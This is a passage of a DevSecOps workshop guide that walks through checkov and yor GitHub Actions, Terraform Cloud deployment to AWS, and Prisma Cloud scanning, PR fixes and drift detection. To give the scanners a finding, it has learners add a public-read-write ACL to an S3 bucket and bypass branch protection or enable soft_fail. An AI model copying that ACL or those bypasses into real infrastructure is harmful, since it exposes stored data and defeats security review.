https://api4.prismacloud.io 452 | 453 | - name: Upload SARIF file 454 | uses: GitHub/codeql-action/upload-sarif@v3 455 | 456 | # Results are generated only on a success or failure 457 | # this is required since GitHub by default won't run the next step 458 | # when the previous one has failed. Alternatively, enable soft_fail in checkov action. 
459 | if: success() || failure() 460 | with: 461 | sarif_file: results.sarif 462 | ``` 463 | 464 | Once complete, click `Commit changes...` at the top right, then select `commit directly to the main branch` and click `Commit changes`. The snippet references `actions/checkout@v2` and `bridgecrewio/checkov-action@master` by tag and branch name, both of which can move; outside this lab, pin each action to a full commit SHA that has been reviewed. 465 | 466 | ![](images/gh-action-edit.png) 467 | 468 | 469 | Verify that the action is running (or has run) by navigating back to the `Actions` tab. 470 | 471 | ![](images/gh-actions-workflows.png) 472 | 473 | 474 | > **⍰ Question** 475 | > 476 | > The action will result in a "Failure" (❌) on the first run, why does this happen? 477 | 478 | 479 | View the results of the run by clicking on the `Create checkov.yaml` link. 480 | 481 | ![](images/gh-actions-results.png) 482 | 483 | Notice the policy violations that were seen earlier in CLI/Cloud9 are now displayed here. However, this is not the only place they are sent... 484 | 485 | ## View results in GitHub Security 486 | Checkov natively supports SARIF format and generates this output by default. GitHub Security accepts SARIF for uploading security issues. The GitHub Action created earlier handles the plumbing between the two. 487 | 488 | 489 | Navigate to the `Security` tab in GitHub, then click `Code scanning` from the left sidebar or `View alerts` in the **Security overview > Code scanning alerts** section. 490 | 491 | ![](images/ghas-overview.png) 492 | 493 | The security issues found by checkov are surfaced here for developers to get actionable feedback on the codebase they are working in without having to leave the platform. 494 | 495 | ![](images/ghas-code-scanning-results.png) 496 | 497 | 498 | > [!TIP] 499 | > Code scanning alerts can be integrated into many other tools and workflows. 500 | 501 | 502 | 503 | ## Tag and Trace with yor 504 | [Yor](https://yor.io) is another open source tool that can be used for tagging and tracing IaC resources from code to cloud. 
For example, yor can be used to add git metadata and a unique hash to a terraform resource; this can be used to better manage resource lifecycles, improve change management, and ultimately to help tie code definitions to runtime configurations. 505 | 506 | Create a new file in the GitHub UI under the path `.github/workflows/yor.yaml`. 507 | 508 | ![](images/gh-new-file.png) 509 | 510 | Add the following code snippet: 511 | 512 | ```yaml 513 | name: IaC tag and trace 514 | 515 | on: 516 | push: 517 | pull_request: 518 | 519 | jobs: 520 | yor: 521 | runs-on: ubuntu-latest 522 | permissions: 523 | contents: write 524 | 525 | steps: 526 | - uses: actions/checkout@v2 527 | name: Checkout repo 528 | with: 529 | fetch-depth: 0 530 | - name: Run yor action 531 | uses: bridgecrewio/yor-action@main 532 | 533 | ``` 534 | 535 | This time, click `Commit changes...` at the top right, then select `Create a new branch` and click `Propose changes`. Click `Create pull request` on the next screen. 536 | 537 | 538 | Check that the action is running, queued, or finished under the `Actions` tab. 539 | 540 | More importantly, look at what yor updated by following the commit history and viewing any `.tf` file in the `code/` directory. The workflow's `contents: write` permission is what allows the action to commit these tag changes back to the repository, so outside this lab pin `bridgecrewio/yor-action` to a reviewed commit SHA rather than the moving `@main` branch. 541 | 542 | 543 | 544 | 545 | Notice the `yor_trace` tag? This can be used to track "drift" between IaC definitions and runtime configurations. 546 | 547 | ## Branch Protection Rules 548 | Using Branch Protection Rules allows for criteria to be set in order for pushes and pull requests to be merged to a given branch. This can be set up to run checkov and block merges if there are any misconfigurations or vulnerabilities. 549 | 550 | Within GitHub, go to the `Settings` tab and navigate to `Branches` on the left sidebar, then click `Add branch protection rule`. 551 | 552 | ![](images/gh-branch-protection.png) 553 | 554 | Enter `main` as the `Branch name pattern`. 
Then select `Require status checks to pass before merging`, search for `checkov` in the provided search bar and select it as a required check. Leave the rest as default (unchecked), then click `Create`. With the remaining options unchecked, repository administrators can still bypass the rule, which a later step in this guide relies on. 555 | 556 | ![](images/gh-bp-rule.png) 557 | 558 | 559 | 560 | ## BONUS: Pre-commit Hooks 561 | Checkov can also be configured as a pre-commit hook. Read how to set it up [here!](https://www.checkov.io/4.Integrations/pre-commit.html) 562 | 563 | 564 | ## Integrate workflow with Terraform Cloud 565 | Let's continue by integrating our GitHub repository with Terraform Cloud. We will then use Terraform Cloud to deploy IaC resources to AWS. 566 | 567 | Navigate to [Terraform Cloud](https://app.terraform.io) and sign in / sign up. The community edition is all that is needed for this workshop. 568 | 569 | Once logged in, follow the prompt to set up a new organization. 570 | 571 | ![](images/tfc-welcome.png) 572 | 573 | Enter an `Organization name` and provide your email address. 574 | 575 | 576 | 577 | 578 | Create a workspace using the `Version Control Workflow` option. 579 | 580 | ![](images/tfc-vcs-workflow.png) 581 | 582 | Select `GitHub`, then `GitHub.com` from the dropdown. Authenticate with GitHub and authorize the connection. 583 | 584 | 585 | 586 | 587 | Choose `prisma-cloud-devsecops-workshop` from the list of repositories. 588 | 589 | ![](images/tfc-add-repo.png) 590 | 591 | Add a `Workspace Name` and click `Advanced options`. 592 | 593 | 594 | 595 | 596 | In the `Terraform Working Directory` field, enter `/code/build/`. Select `Only trigger runs when files in specified paths change`. 597 | 598 | 599 | 600 | 601 | Leave the rest of the options as default and click `Create`. 602 | 603 | 604 | 605 | Almost done. In order to deploy resources to AWS, we need to provide Terraform Cloud with AWS credentials. We need to add our credentials as workspace variables. Click `Continue to workspace overview` to continue. 
606 | 607 | ![](images/tfc-workspace-created.png) 608 | 609 | Click `Configure variables` 610 | 611 | 612 | 613 | Add variables for `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`. Ensure you select `Environment variables` for both and that `AWS_SECRET_ACCESS_KEY` is marked as `Sensitive`. A variable marked `Sensitive` is write-only, so the secret key cannot be read back from the Terraform Cloud UI once it is saved. 614 | 615 | ![](images/tfc-vars1.png) 616 | 617 | Review the variables then return to your workspace overview when finished. 618 | 619 | ![](images/tfc-vars2.png) 620 | 621 | Terraform Cloud is now configured and our pipeline is ready to go. Let's test this out by submitting a pull request. 622 | 623 | 624 | ## Block a Pull Request, Prevent a Deployment 625 | We have now configured a GitHub repository to be scanned with checkov and to trigger Terraform Cloud to deploy infrastructure. Let's see how this works in action. 626 | 627 | Create a new file in the GitHub UI under the path `code/build/s3.tf`. Enter the following code snippet into the new file. 628 | 629 | 630 | ```hcl 631 | provider "aws" { 632 | region = "us-west-2" 633 | } 634 | 635 | resource "aws_s3_bucket" "dev_s3" { 636 | bucket_prefix = "dev-" 637 | 638 | tags = { 639 | Environment = "Dev" 640 | } 641 | } 642 | 643 | resource "aws_s3_bucket_ownership_controls" "dev_s3" { 644 | bucket = aws_s3_bucket.dev_s3.id 645 | rule { 646 | object_ownership = "BucketOwnerPreferred" 647 | } 648 | } 649 | 650 | ``` 651 | 652 | Once complete, click `Commit changes...` at the top right, then select `Create a new branch and start a pull request` and click `Propose changes`. 653 | 654 | ![](images/gh-pr.png) 655 | 656 | At the next screen, review the diff then click `Create pull request`. 657 | 658 | ![](images/gh-create-pr.png) 659 | 660 | One more time... click `Create pull request` to open the PR. 661 | 662 | ![](images/gh-open-pr.png) 663 | 664 | Wait for the checks to run. Then take note of the result: a blocked pull request! 
665 | 666 | ![](images/gh-blocked-pr.png) 667 | 668 | Either bypass branch protections and `Merge pull request` or go back to the GitHub Action for checkov and uncomment the `soft_fail: true` line (the action's equivalent of checkov's `--soft-fail` option). With `soft_fail` enabled the scan still reports its findings but no longer fails the check, so the merge is not blocked. This will require closing and reopening the pull request. 669 | 670 | > **⍰ Question** 671 | > 672 | > What other command options could be used to get the pipeline to pass? 673 | 674 | 675 | ## Deploy to AWS 676 | Navigate to Terraform Cloud and view the running plan. 677 | 678 | ![](images/tfc-run-queued.png) 679 | 680 | Once finished, click `Confirm & apply` to deploy the s3 bucket to AWS. 681 | 682 | ![](images/tfc-apply.png) 683 | 684 | Go to the S3 menu within AWS to view the bucket that has been deployed. 685 | 686 | ![](images/aws-s3.png) 687 | 688 | 689 | > **⍰ Question** 690 | > 691 | > Given that we only supplied the s3 bucket with a prefix and not a specific bucket name, how can you tell which s3 bucket is the one *you* deployed? 692 | 693 | > [!TIP] 694 | > We used a tool to tag IaC resources... 695 | 696 | 697 | Now let's see how we can leverage Prisma Cloud to make this all easier, gain more features and scale security with ease. 698 | 699 | ## 700 | # Section 2: Application Security with Prisma Cloud 701 | > [!NOTE] 702 | > *This portion of the workshop is intended to be view-only. Those with existing access to Prisma Cloud can follow along but it is not recommended to onboard any of the workshop content into a production deployment of Prisma Cloud. Use this guide as an example and the content within for demonstration purposes only.* 703 | 704 | ## Welcome to Prisma Cloud 705 | ![](images/prisma-welcome.png) 706 | 707 | Prisma Cloud is a Cloud Native Application Protection Platform (CNAPP) comprised of three main pillars: 708 | - Cloud Security 709 | - Runtime Security 710 | - Application Security 711 | 712 | Across these three "modules", Prisma Cloud provides comprehensive security capabilities spanning code to cloud. 
This workshop will mainly focus on the Application Security module within the Prisma Cloud platform. 713 | 714 | ## Onboard AWS Account 715 | > [!NOTE] 716 | > Link to docs: [Onboard AWS Account](https://docs.prismacloud.io/en/enterprise-edition/content-collections/connect/connect-cloud-accounts/onboard-aws/onboard-aws-account) 717 | 718 | To begin securing resources running in the cloud, we need to configure Prisma Cloud to communicate with a CSP. Let's do this by onboarding an AWS Account. 719 | 720 | Navigate to **Settings > Providers > Connect Provider** and follow the instructions prompted by the configuration wizard. 721 | 722 | ![](images/prisma-cloud-account.png) 723 | 724 | Select **Amazon Web Services**. 725 | 726 | ![](images/prisma-csp-onboarding.png) 727 | 728 | Choose **Account** for the scope, deselect **Agentless Workload Scanning**, leave the rest as default and click **Done**. 729 | 730 | ![](images/prisma-aws1.png) 731 | 732 | Provide your **Account ID** and enter an **Account Name**. Then click **Create IAM Role** to have Prisma Cloud auto-configure itself. 733 | 734 | ![](images/prisma-aws2.png) 735 | 736 | Scroll to the bottom of the AWS page that opens, click to **acknowledge** the disclaimer and then click **Create stack**. The stack creates the IAM role whose ARN is handed to Prisma Cloud in a later step, so this is the point to review what access the template grants. 737 | 738 | ![](images/aws-create-stack.png) 739 | 740 | Wait a moment while the stack is created; we need an output from the final result of the stack being deployed. 741 | 742 | ![](images/prisma-cfn.png) 743 | 744 | Once created, go to the **Outputs** tab and copy the ARN value displayed. 745 | 746 | ![](images/prisma-cfn-output.png) 747 | 748 | Head back to Prisma Cloud and paste this value into the **IAM Role ARN** field, then click **Next**. 749 | 750 | ![](images/prisma-aws3.png) 751 | 752 | Wait for the connectivity test to run, review the status and click **Save and Close**. 753 | 754 | ![](images/prisma-aws4.png) 755 | 756 | View the onboarded cloud account under **Settings > Providers**. 
757 | 758 | ![](images/prisma-aws-added.png) 759 | 760 | Prisma Cloud will now begin to scan the configured AWS Account for misconfigurations associated with deployed resources. Let the initial scan run in the background and we will come back to this in a later section. 761 | 762 | ## Integrations and Providers 763 | Prisma Cloud has a wide variety of built-in integrations to help operationalize within a cloud ecosystem. 764 | 765 | Navigate to `Settings` at the top, then select `Providers` from the left sidebar. Click the `Connect Provider` button on the top right. 766 | 767 | ![](images/prisma-code-build-providers.png) 768 | 769 | Notice all of the different tools that can be integrated natively. 770 | 771 | ![](images/prisma-connect-providers.png) 772 | 773 | Let's start by integrating with checkov. 774 | 775 | 776 | ## Checkov with API Key 777 | > [!NOTE] 778 | > Link to docs: [Creating Access Keys for Prisma Cloud](https://docs.prismacloud.io/en/enterprise-edition/content-collections/administration/create-access-keys) 779 | > 780 | > Link to docs: [Add Checkov to Prisma Cloud](https://docs.prismacloud.io/en/classic/appsec-admin-guide/get-started/connect-your-repositories/ci-cd-runs/add-checkov) 781 | 782 | To generate an API key, navigate to **Settings > Access Control**. Click the `Add` button and select `Access Key`. 783 | 784 | ![](images/prisma-access-control.png) 785 | 786 | Download the csv file containing the credentials then click `Done`. 787 | 788 | 789 | 790 | 791 | 792 | ![](images/prisma-access-key-created.png) 793 | 794 | In a terminal window run checkov against the entire `code` directory, now with an API key. Use the following command: 795 | 796 | > [!WARNING] 797 | > Replace the `access_key_id`, `secret_key` and `prisma-api-url` with your values. 798 | 799 | ``` 800 | checkov -d . 
--bc-api-key <access_key_id>::<secret_key> --repo-id prisma/devsecops-workshop --prisma-api-url https://api4.prismacloud.io 801 | ``` 802 | 803 | ![](images/c9-checkov-api-key.png) 804 | 805 | Notice how the results now contain a severity. There are some other features that come with Prisma Cloud (using an API key) as well... Note that a key typed on the command line is kept in shell history; checkov also accepts it through the `BC_API_KEY` environment variable. 806 | 807 | Return back to Prisma Cloud to view the results that checkov surfaced in the platform. Navigate to **Application Security > Projects**. 808 | 809 | ![](images/prisma-checkov-results.png) 810 | 811 | Let's add this same API key to the GitHub Action created earlier. Within your GitHub repository, go to **Settings > Secrets and variables** then select **Actions**. 812 | 813 | ![](images/github-secrets.png) 814 | 815 | Click `New repository secret`, name it `BC_API_KEY` (the name the workflow reads from `secrets`), then input the `<access_key_id>::<secret_key>` pair as the secret value. 816 | 817 | ![](images/github-repo-secret.png) 818 | 819 | ![](images/github-create-secret.png) 820 | 821 | Edit `checkov.yaml` and uncomment the `api-key`, `env` and `PRISMA_API_URL` lines. 822 | 823 | ![](images/gh-edit-checkov.png) 824 | 825 | Commit directly to main branch. 826 | 827 | 828 | 829 | Now check the results under **Security > Code scanning**. The same findings that were displayed here earlier now carry a **Severity** to sort and prioritize with. 830 | 831 | ![](images/gh-security-results.png) 832 | 833 | Return again to Prisma Cloud to view the results that were sent to the platform. 834 | 835 | ![](images/prisma-gha-results.png) 836 | 837 | > [!TIP] 838 | > You can use Prisma Cloud (checkov w/ an API key) to scan docker images for vulnerabilities! Use the `--docker-image` flag and point to an image name or ID. 
839 | 840 | ## Terraform Cloud Run Tasks 841 | > [!NOTE] 842 | > Link to docs: [Connect Terraform Cloud - Run Tasks](https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/get-started/connect-code-and-build-providers/ci-cd-runs/add-terraform-run-tasks) 843 | 844 | Let's now connect Prisma Cloud with Terraform Cloud using the Run Tasks integration. This allows for developers and platform teams to get immediate security feedback for every pipeline run. The Run Task integration will also surface results of every pipeline run to Prisma Cloud and the Security team. 845 | 846 | First we need to create an API key in Terraform Cloud. Go to the Terraform Cloud console and navigate to **User Settings > Tokens** then click **Create an API Token**. 847 | 848 | ![](images/tfc-create-token.png) 849 | 850 | Name the token something meaningful, then click **Generate token**. 851 | 852 | ![](images/tfc-token-created.png) 853 | 854 | Copy the token and save the value somewhere safe. This will be provided to Prisma Cloud in the next step. 855 | 856 | Go to the Prisma Cloud console and navigate to **Settings > Connect Provider > Code & Build Providers** to set up the integration. 857 | 858 | ![](images/prisma-code-build-providers.png) 859 | 860 | Under **CI/CD Runs**, choose **Terraform Cloud (Run Tasks)**. 861 | 862 | 863 | 864 | Enter the API token generated in Terraform Cloud and click **Next**. 865 | 866 | 867 | 868 | Select your **Organization**. 869 | 870 | 871 | 872 | Select your **Workspace** and choose the **Run Stage** in which you want Prisma Cloud to execute a scan. `Pre-plan` will scan HCL code, `Post-plan` will scan the Terraform plan.out file. 873 | 874 | 875 | 876 | > **⍰ Question** 877 | > 878 | > What are some advantages and/or limitations between scanning HCL files and scanning plan.out files? 879 | 880 | Once completed, click **Done**. 881 | 882 | 883 | 884 | Return back to Terraform Cloud to view the integration. 
Go to your **Workspace** and click **Settings > Run Tasks**. 885 | 886 | ![](images/tfc-run-task-created.png) 887 | 888 | 889 | 890 | ## GitHub Application 891 | > [!NOTE] 892 | > Link to docs: [Connect GitHub](https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/get-started/connect-code-and-build-providers/code-repositories/add-GitHub) 893 | 894 | 895 | Next we will set up the Prisma Cloud GitHub Application which will perform easy-to-configure code scanning for GitHub repos. 896 | 897 | Go to Prisma Cloud and create a new integration under **Settings > Connect Provider > Code & Build Providers**. 898 | 899 | ![](images/prisma-code-build-providers.png) 900 | 901 | Under **Code Repositories**, select **GitHub**. 902 | 903 | 904 | 905 | Follow the install wizard and **Authorize** your GitHub account. 906 | 907 | 908 | 909 | Select the repositories you would like to provide access to and click **Install & Authorize**. 910 | 911 | 912 | 913 | Select the target repositories to scan now accessible from the Prisma Cloud wizard, then click **Next**. 914 | 915 | 916 | 917 | Click **Done** once completed. Navigate to **Settings > Providers > Repositories** to view the onboarded repo(s). 918 | 919 | ![](images/prisma-gh-done.png) 920 | 921 | Also navigate to **Application Security > Projects** to view the results coming from the integration. 922 | 923 | ![](images/prisma-gh-app-results.png) 924 | 925 | ## Submit a Pull Request 2.0 926 | 927 | Let's push a change to test the integration. Navigate to GitHub and make a change to the s3 resource deployed earlier under `code/build/s3.tf`. 928 | 929 | 930 | 931 | 932 | Add the following line of code to the s3 resource definition. This ACL deliberately makes the bucket publicly readable and writable so that the scanners have a misconfiguration to flag. Then click **Commit changes...** once complete. 933 | 934 | ``` 935 | acl = "public-read-write" 936 | ``` 937 | 938 | ![](images/gh-edit-s3.png) 939 | 940 | 941 | Create a new branch and click **Propose changes**. 
942 | 943 | 944 | 945 | On the next page, review the diff then click **Create pull request**. Once again, click **Create pull request** to open the pull request. 946 | 947 | Let the checks run against the pull request. Prisma Cloud can review pull requests and will add comments with proposed changes to give developers actionable feedback within their VCS platform. 948 | 949 | ![](images/gh-prisma-comments.png) 950 | 951 | 952 | When ready, click **Merge pull request**, bypassing branch protection rules if still enabled. 953 | 954 | 955 | Now that the change has been merged, navigate back to Terraform Cloud to view the pipeline running. 956 | 957 | ![](images/tfc-plan-running.png) 958 | 959 | 960 | Check the **Post-plan** stage and view the results of the Prisma Cloud scan. 961 | 962 | ![](images/tfc-post-plan.png) 963 | 964 | Leave this as is for now. We will soon fix the error and retrigger the pipeline. 965 | 966 | 967 | ## View scan results in Prisma Cloud 968 | Return to Prisma Cloud to view the results of all the scans that were just performed. 969 | 970 | Navigate to **Application Security > Projects > Overview** to view findings for all scans. Filter the results with the **Repository** drop-down menu. 971 | 972 | ![](images/prisma-appsec-projects.png) 973 | 974 | View relevant CI/CD Risks under **Application Security > CI/CD Risks**: 975 | 976 | ![](images/prisma-cicd-risks.png) 977 | 978 | Get a full SBOM analysis under **Application Security > SBOM**: 979 | 980 | ![](images/prisma-sbom.png) 981 | 982 | 983 | Take a look at **Dashboards > Code Security** to get top-level reports. 
984 | 985 | ![](images/prisma-dashboard-code.png) 986 | 987 | Another useful view can be found under **Inventory > IaC Resources** 988 | 989 | ![](images/prisma-inventory.png) 990 | 991 | ## Enforcement Rules 992 | 993 | The level of enforcement applied to each code scan can be controlled under **Settings > Configure > Application Security > Enforcement Rules** 994 | 995 | ![](images/prisma-enforcement-rules.png) 996 | 997 | These can be adjusted as a top-down policy or exceptions can be created for specific repositories / integrations. 998 | 999 | ![](images/prisma-enforcement-rules1.png) 1000 | 1001 | ![](images/prisma-enforcement-rules2.png) 1002 | 1003 | ![](images/prisma-enforcement-rules3.png) 1004 | 1005 | 1006 | 1007 | ## Issue a PR-Fix 1008 | Let's create a pull request from the Prisma Cloud console to apply a code fix. Navigate to **Application Security > Projects > Overview IaC Misconfiguration** then find the `dev_s3` bucket with the public access violations. 1009 | 1010 | ![](images/prisma-pr-fix1.png) 1011 | 1012 | Then click the **Submit** button in the top right to open a pull request. 1013 | 1014 | ![](images/prisma-pr-fix2.png) 1015 | 1016 | Navigate back to GitHub and check the **Pull request** tab to see the fix Prisma Cloud submitted. 1017 | 1018 | ![](images/gh-pr-fix1.png) 1019 | 1020 | Drill into the pull request and inspect the file changes under the **Files changed** tab. Notice the changes made to remediate the original policy violation. 1021 | 1022 | ![](images/gh-pr-fix2.png) 1023 | 1024 | Go back to the **Conversation** tab and click **Merge the pull request** at the bottom to check this code into the main branch. 1025 | 1026 | ![](images/gh-merge-pr-fix.png) 1027 | 1028 | Check Terraform Cloud to view the plan run successfully. No need to apply this run as we will use the earlier deployment for our next example. 
1029 | 1030 | ![](images/tfc-pr-fix.png) 1031 | 1032 | 1033 | ## Drift Detection 1034 | > [!NOTE] 1035 | > Link to docs: [Setup Drift Detection](https://docs.prismacloud.io/en/classic/appsec-admin-guide/get-started/drift-detection) 1036 | 1037 | In this final section, we will use the pipeline we built to detect drift. Drift occurs when infrastructure running in the cloud becomes configured differently from what was originally defined in code. 1038 | 1039 | This usually happens during a major incident, where DevOps and SRE teams make manual changes to quickly solve a problem, such as opening up ports to larger CIDR blocks or turning off HTTPS to find the problem. Sometimes lack of access and/or familiarity with IaC/CICD makes fixing an issue directly in the cloud easier than fixing in code and redeploying. If these changes aren’t reverted, they present security issues and weaken the benefits of using IaC. 1040 | 1041 | We will use the S3 bucket deployed earlier to simulate drift in a resource configuration. 1042 | 1043 | > [!NOTE] 1044 | > By default Prisma Cloud performs full resource scans on an hourly interval. 1045 | 1046 | 1047 | Let's first examine the policies associated with drift. Go to **Governance > Overview** and search for `Traced resources are manually modified`. Notice the policies for each CSP. Ensure the policy for AWS is enabled. 1048 | 1049 | ![](images/prisma-traced-resource-policies.png) 1050 | 1051 | Next, go to the AWS Console under S3 buckets and add a new tag to the bucket created earlier. 1052 | 1053 | ![](images/aws-s3-properties.png) 1054 | 1055 | For example, add a tag with the key/value pair `drift` = `true` and click **Save changes**. 1056 | 1057 | ![](images/aws-tag-drift.png) 1058 | 1059 | On the next scan Prisma Cloud will detect this change and notify users that a resource configuration has changed from how it is defined in code. 
To view this, navigate to **Projects > IaC Misconfiguration** and filter for **Drift** under the **IaC Categories** dropdown menu. 1060 | 1061 | ![](images/prisma-drift-result.png) 1062 | 1063 | Prisma Cloud provides the option to revert the change via the same pull request mechanism we just performed which would trigger a pipeline run and patch the resource. 1064 | 1065 | 1066 | 1067 | # Wrapping Up 1068 | Congrats! In this workshop, we didn’t just learn how to identify and automate fixing misconfigurations — we learned how to bridge the gaps between Development, DevOps, and Cloud Security. We are now equipped with full visibility, guardrails, and remediation capabilities across the development lifecycle. We also learned how important and easy it is to make security accessible to our engineering teams. 1069 | 1070 | Try more of the integrations with other popular developer and DevOps tools. Share what you’ve found with other members of your team and show how easy it is to incorporate this into their development processes. 1071 | 1072 | You can also check out the [Prisma Cloud DevDay](https://register.paloaltonetworks.com/securitydevdays) to experience more of the platform in action. 
1073 | -------------------------------------------------------------------------------- /guide/images/aws-create-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-create-stack.png -------------------------------------------------------------------------------- /guide/images/aws-s3-properties.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-s3-properties.png -------------------------------------------------------------------------------- /guide/images/aws-s3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-s3.png -------------------------------------------------------------------------------- /guide/images/aws-tag-drift.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/aws-tag-drift.png -------------------------------------------------------------------------------- /guide/images/c9-blank-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-blank-shell.png -------------------------------------------------------------------------------- /guide/images/c9-checkov-api-key.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-api-key.png -------------------------------------------------------------------------------- /guide/images/c9-checkov-d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-d.png -------------------------------------------------------------------------------- /guide/images/c9-checkov-list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-list.png -------------------------------------------------------------------------------- /guide/images/c9-checkov-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-checkov-options.png -------------------------------------------------------------------------------- /guide/images/c9-close-welcome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-close-welcome.png -------------------------------------------------------------------------------- /guide/images/c9-console-home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-console-home.png 
-------------------------------------------------------------------------------- /guide/images/c9-create-env.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-create-env.png -------------------------------------------------------------------------------- /guide/images/c9-env-options1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-env-options1.png -------------------------------------------------------------------------------- /guide/images/c9-env-options2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-env-options2.png -------------------------------------------------------------------------------- /guide/images/c9-env-options3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-env-options3.png -------------------------------------------------------------------------------- /guide/images/c9-git-clone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-git-clone.png -------------------------------------------------------------------------------- /guide/images/c9-install-checkov.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-install-checkov.png -------------------------------------------------------------------------------- /guide/images/c9-open-ide.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-open-ide.png -------------------------------------------------------------------------------- /guide/images/c9-open-term.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-open-term.png -------------------------------------------------------------------------------- /guide/images/c9-py-venv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-py-venv.png -------------------------------------------------------------------------------- /guide/images/checkov-custom-checks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/checkov-custom-checks.png -------------------------------------------------------------------------------- /guide/images/checkov-result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/checkov-result.png -------------------------------------------------------------------------------- 
/guide/images/checkov-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/checkov-secrets.png -------------------------------------------------------------------------------- /guide/images/devsecops-workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/devsecops-workflow.png -------------------------------------------------------------------------------- /guide/images/ee-creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ee-creds.png -------------------------------------------------------------------------------- /guide/images/ee-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ee-login.png -------------------------------------------------------------------------------- /guide/images/ee-sign-in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ee-sign-in.png -------------------------------------------------------------------------------- /guide/images/gh-action-commit.png: -------------------------------------------------------------------------------- 
